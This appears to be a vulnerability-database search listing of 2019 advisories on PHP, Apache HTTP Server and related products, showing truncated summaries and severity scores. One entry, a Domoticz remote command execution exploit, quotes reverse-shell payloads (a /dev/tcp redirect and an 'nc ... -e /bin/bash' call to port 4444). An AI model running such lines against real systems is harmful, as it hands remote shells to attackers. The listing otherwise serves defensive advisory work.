Lucene search
K

11650 matches found

Veracode
Veracode
added 2019/05/02 4:42 a.m.42 views

Denial Of Service (DoS) And Remote Code Execution (RCE)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

9.8CVSS7.8AI score0.99998EPSS
Exploits60References16Affected Software2
Veracode
Veracode
added 2019/05/02 4:42 a.m.47 views

Denial Of Service (DoS)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

9.8CVSS7.8AI score0.99998EPSS
Exploits60References9Affected Software1
Veracode
Veracode
added 2019/05/02 4:42 a.m.52 views

Denial Of Service (DoS)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

9.8CVSS6.3AI score0.99998EPSS
Exploits56References9Affected Software2
Veracode
Veracode
added 2019/05/02 4:42 a.m.45 views

Arbitrary Code Execution

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

9.8CVSS6.3AI score0.99998EPSS
Exploits56References24Affected Software2
0day.today
0day.today
added 2019/05/01 12:0 a.m.98 views

Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit

Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...

7.5CVSS8.8AI score0.1727EPSS
Exploits5
Tenable Nessus
Tenable Nessus
added 2019/04/30 12:0 a.m.47 views

EulerOS 2.0 SP3 : httpd (EulerOS-SA-2019-1294)

According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In Apache HTTP Server 2.4 release 2.4.37 and prior, modsession checks the session expiry time before decoding the session. This causes session expir...

7.5CVSS6.4AI score0.19994EPSS
Exploits0References2
Tenable Nessus
Tenable Nessus
added 2019/04/30 12:0 a.m.26 views

EulerOS 2.0 SP5 : git (EulerOS-SA-2019-1291)

According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - git: arbitrary code execution via .gitmodules CVE-2018-17456 Note that Tenable Network Security has extracted the preceding description block directly...

9.8CVSS7.8AI score0.97356EPSS
Exploits12References2
Tenable Nessus
Tenable Nessus
added 2019/04/26 12:0 a.m.65 views

NGINX Unit HTTP Server Detection

Nessus was able to detect the NGINX Unit HTTP server by looking at the HTTP banner on the remote host. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid124336; scriptversion"1.4"; scriptsetattributeattribute:"pluginmodificationdate", value:"2022/10/12";...

5.5AI score
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2019/04/26 12:0 a.m.36 views

Amazon Linux 2 : mod_http2 (ALAS-2019-1197)

In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 modhttp2 connections.CVE-2018-17189 C Tenable Network...

5.3CVSS6.3AI score0.19404EPSS
Exploits0References2
IBM Security Bulletins
IBM Security Bulletins
added 2019/04/25 7:45 a.m.56 views

Security Bulletin: IBM Security SiteProtector System is affected by Apache HTTP Server vulnerabilities

Summary IBM Security SiteProtector System has addressed the following vulnerabilities in Apache HTTP Server. Vulnerability Details CVEID: CVE-2018-11759 DESCRIPTION: Apache Tomcat JK modjk Connector could allow a remote attacker to traverse directories on the system, caused by the improper handli...

8.1CVSS0.8AI score0.90647EPSS
Exploits3Affected Software1
Amazon
Amazon
added 2019/04/25 12:0 a.m.41 views

Low: mod_http2

Issue Overview: In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 modhttp2 connections.CVE-2018-17189...

5.3CVSS6.8AI score0.19404EPSS
Exploits0
BDU FSTEC
BDU FSTEC
added 2019/04/25 12:0 a.m.4 views

The vulnerability of the Perl module of the Apache HTTP Server, related to the injection of code into the .htaccess file of the user, allows a hacker to execute arbitrary code.

The vulnerability of the Perl module used by the Apache HTTP Server is related to the injection of code into the .htaccess file of the user’s directory. Exploiting this vulnerability allows a remote attacker to execute arbitrary Perl code on behalf of the user, thereby executing Apache HTTP serve...

10CVSS7.7AI score0.08946EPSS
Exploits0References4Affected Software2
IBM Security Bulletins
IBM Security Bulletins
added 2019/04/24 8:50 p.m.71 views

Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect IBM Cognos Business Intelligence

Summary This bulletin addresses several security vulnerabilities in Apache HTTP Server that are fixed in IBM Cognos Business Intelligence. Vulnerability Details CVEID: CVE-2016-0736 DESCRIPTION: Apache HTTPD could allow a remote attacker to obtain sensitive information, caused by an error in...

9.8CVSS1AI score0.49024EPSS
Exploits4Affected Software1
IBM Security Bulletins
IBM Security Bulletins
added 2019/04/24 5:50 a.m.51 views

Security Bulletin: Apache HTTP Server vulnerability in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Performance Manager ( CVE-2018-17199).

Summary Apache HTTP Server vulnerability has been identified in WebSphere Application Server. WebSphere Application Server is shipped with Tivoli Netcool Performance Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulleti...

0.2AI score0.19994EPSS
Exploits0Affected Software1
IBM Security Bulletins
IBM Security Bulletins
added 2019/04/23 5:30 p.m.29 views

Security Bulletin: Multiple vulnerabilities in IBM HTTP Server used by WebSphere Application Server (CVE-2019-0211 CVE-2019-0220)

Summary There are multiple vulnerabilities in the IBM HTTP Server used by WebSphere Application Server. CVE-2019-0211 affects version 9 non-windows platforms only. Vulnerability Details CVEID: CVE-2019-0220 DESCRIPTION: Apache HTTP Server could provide weaker than expected security, caused by URL...

7.8CVSS0.6AI score0.65005EPSS
Exploits8Affected Software1
Gentoo Linux
Gentoo Linux
added 2019/04/22 12:0 a.m.173 views

Apache: Privilege escalation

Background The Apache HTTP server is one of the most popular web servers on the Internet. Description A vulnerability was discovered in Apache with MPM event, worker, or prefork. Impact An attacker could escalate privileges. Workaround There is no known workaround at this time. Resolution All...

7.8CVSS2.2AI score0.65005EPSS
Exploits8
Tenable Nessus
Tenable Nessus
added 2019/04/19 12:0 a.m.84 views

Oracle Primavera Unifier Multiple Vulnerabilities (Apr 2019 CPU)

According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.7 or 17.7.x prior to 17.12.10 or 18.x prior to 18.8.6. It is, therefore, affected by multiple vulnerabilities: - A deserialization vulnerability in...

9.8CVSS8.1AI score0.94999EPSS
Exploits12References9
Tenable Nessus
Tenable Nessus
added 2019/04/18 12:0 a.m.59 views

Oracle Fusion Middleware Oracle HTTP Server (Apr 2019 CPU)

The version of Oracle HTTP Server installed on the remote host is affected by a stack-based buffer overflow as noted in the April 2019 CPU advisory. The condition exists in the included cURL library due to using unsigned math when preventing the overflow. An unauthenticated, remote attacker can...

9.8CVSS7.3AI score0.12771EPSS
Exploits1References2
Tenable Nessus
Tenable Nessus
added 2019/04/17 12:0 a.m.57 views

openSUSE Security Update : apache2 (openSUSE-2019-1209)

This update for apache2 fixes the following issues : - CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the...

7.8CVSS7.3AI score0.65005EPSS
Exploits8References10
Tenable Nessus
Tenable Nessus
added 2019/04/17 12:0 a.m.28 views

CentOS 7 : mod_auth_mellon (CESA-2019:0766)

An update for modauthmellon is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability...

8.1CVSS6.9AI score0.02969EPSS
Exploits1References3
Rows per page
Query Builder